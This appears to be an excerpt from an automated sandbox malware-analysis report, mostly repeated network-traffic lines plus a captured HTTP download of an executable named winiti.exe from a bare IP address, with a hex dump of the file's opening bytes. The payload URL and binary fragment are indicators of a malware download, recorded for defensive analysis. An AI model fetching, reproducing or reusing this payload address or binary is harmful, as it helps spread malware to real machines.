                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.219.239.104:80
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 104.219.239.104:80 -> 192.168.2.22:49163
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 31 Jul 2024 11:22:04 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 31 Jul 2024 05:24:21 GMTETag: "b1200-61e844e76788f"Accept-Ranges: bytesContent-Length: 725504Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 85 ca a9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 06 0b 00 00 0a 00 00 00 00 00 00 de 24 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 24 0b 00 4f 00 00 00 00 40 0b 00 04 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 b4 02 0b 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 04 0b 00 00 20 00 00 00 06 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 04 06 00 00 00 40 0b 00 00 08 00 00 00 08 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 10 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 24 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 5c 53 00 00 28 83 00 00 03 00 00 00 2a 00 00 06 84 d6 00 00 30 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 1e 00 00 00 01 00 00 11 00 02 6f 17 00 00 0a 0a 06 2c 0b 00 02 03 6f 18 00 00 0a 26 2b 07 03 6f 19 00 00 0a 00 2a c6 02 14 7d 06 00 00 04 02 28 1a 00 00 0a 00 00 02 28 08 00 00 06 00 02 02 17 73 64 00 00 06 7d 04 00 00 04 02 7b 04 00 00 04 17 6f 66 00 00 06 00 2a 13 30 02 00 42 00 00 00 01 00 00 11 00 03 28 1b 00 00 0a 20 01 02 00 00 fe 01 0a 06 2c 27 00 03 20 a1 00 00 00 28 1c 00 00 0a 00 03 7e 1d 00 00 0a 28 1e 00 00 0a 00 03 18 73 1f 00 00 0a 28 20 00 00 0a 00 00 02 03 28 21 00 00 0a 00 2a 26 00 02 28 22 00 00 0a 00 2a 13 30 01 00 0f 00 00 00 02 00 00 11 00 73 02 00 00 06 0a 06 6f 23 00 00 0a 00 2a 36 00 72 01 00 00 70 28 24 00 00 0a 26 2a 00 00 00 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 06 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 06 00 00 04 6f 25 00 00 0a 00 00 02 03 28 26 00 00 0a 00 2a 00 13 30 0b 00 11 06 00 00 03 00 00 11 00 d0 07 00
                Source: Joe Sandbox ViewIP Address: 104.219.239.104 104.219.239.104
                Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
                Source: global trafficHTTP traffic detected: GET /15/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
                Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
